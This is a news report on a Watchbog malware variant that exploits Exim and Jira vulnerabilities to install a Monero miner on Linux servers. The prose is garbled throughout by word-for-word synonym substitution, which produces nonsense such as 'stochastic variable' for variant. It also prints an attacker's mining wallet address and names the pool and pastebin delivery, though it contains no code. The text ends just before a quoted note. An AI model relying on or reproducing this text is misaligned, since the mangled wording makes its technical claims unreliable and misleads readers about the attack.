The New edition of this variance is set up polarly . It will too ill-use the CVE-2019 - 10149 remote control defect that give up assailant to carry out rootage overtop after using – an Exim blemish that is get it on to have been victimised in violent at least since 9 June . allot to a flow Shodan look , to a greater extent than 1,610,000 unmated Exim host and over 54,000 vulnerable Atlassian JIRA server could be impact by this round , as per BinaryEdge . It is extremely severe to discover this stochastic variable by any VirusTotal scanning locomotive engine as the Polarply find Watchbog taste own an AV espial ratio of 0/55 — More selective information can be encounter on Intezer Analyze . Wachtbog is a malware line utilise to aggress Linux waiter use vulnerable software program like Jenkins , which was describe by Alibaba Cloud Security investigator , during a May hunting expedition , along with Nexus Repository Manager , 3 , ThinkPHP and Supervisord . target Exim and Jira exposure The former discrepancy line up by the Intezer Labs research worker on VirusTotal US malicious payload to work the CVE-2019 - 11581 vulnerability of the 12 - Day - Old Jira posture injector which precede to Remote Code Execution .
Watchbog download and unravel malicious pastebin dictation after it aim a foothold on vulnerable waiter , which will finally deploy and ply the net miner cryptocurrency shipment on the via media Linux box . Watchbog fire sue Watchbog onset ( envision : Alibaba Cloud Security ) . The malware will also hang on by sum up itself to respective crontabfiles to insure you can seminal fluid back and reinfect system of rules if the user does not begin all the crontab that have been shift . Patch Patch Patch ! add together to Intezer Analyze – https://t.co/hWZBCHNjxM pic.twitter.com/6s7bXCfV9d — polarply ( @polarply ) July 22 , 2019 Infecting Linux server The transmission procedure in Watchbog is rather bare because it dispatch a Monero coinminer from the substance abuser sweat to take it after overwork the vulnerability it point .
Watchbog flak ( envision : Alibaba Cloud Security ) harmonise to the mint mining apparatus file , this stochastic variable employment the excavation kitty minexmr.com angstrom unit easily as the late interpretation of Watchbog and it amass all the money at the 47k2wdnyBoMT6N9ho5Y7u Qg1J6gPsTboKP6JxfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 accost besides put-upon during the Jenkins server place campaign in May .
While the attacker would solely be able to declare oneself the service of process in premature version of the malware to dispatch an contagion promising to transmit the victim a “ cleanup position scriept , ” “ the beginning of the entryway and patch , ” this edition note that “ the missionary work of the assailant is to precaution the cyberspace . ” defrayal speech Payment name and address isolated from the no VirusTotal spying and the change over mark to Jira and Exim server , there embody one More affair that bring in this specific Watchbog variance exceptional : The malicious scription it America to drop down the strike on compromise Linux waiter as well admit a contact notation for its dupe . The stick to promissory note is useable in the malicious playscript :